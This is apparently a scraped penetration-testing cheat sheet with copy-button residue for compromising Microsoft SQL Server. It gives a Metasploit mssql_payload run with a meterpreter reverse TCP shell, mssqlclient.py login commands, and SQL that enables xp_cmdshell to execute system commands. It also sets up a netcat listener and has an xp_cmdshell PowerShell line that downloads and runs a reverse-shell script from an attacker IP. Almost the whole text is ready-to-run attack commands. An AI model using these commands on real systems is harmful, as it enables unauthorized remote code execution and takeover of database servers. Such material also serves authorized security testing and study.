Copiar use exploit/windows/mssql/mssql_payload
set username < usernam e >
set password < passwor d >
set rhosts < IP-addres s >
set payload windows/x64/meterpreter_reverse_tcp
set lhost < attacker-IP-addres s >
set lport < listen-por t >
run
Copiar # Windows authentication
mssqlclient.py < target-nam e > / < usernam e > : < passwor d > @ < IP-addres s > -windows-auth
# Microsft SQL Server authentication
mssqlclient.py < target-nam e > / < usernam e > : < passwor d > @ < IP-addres s >
Copiar EXEC sp_configure 'Show Advanced Options' , 1 ;
reconfigure ;
EXEC sp_configure 'xp_cmdshell' , 1 ;
reconfigure ;
sp_configure;
EXEC master ..xp_cmdshell 'whoami' ;
Copiar python3 -m http.server 80
cp reverse-shell.ps1 .
nc -lvnp < listen-por t >
Copiar EXEC master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attacker-IP-address>/reverse-shell.ps1\");'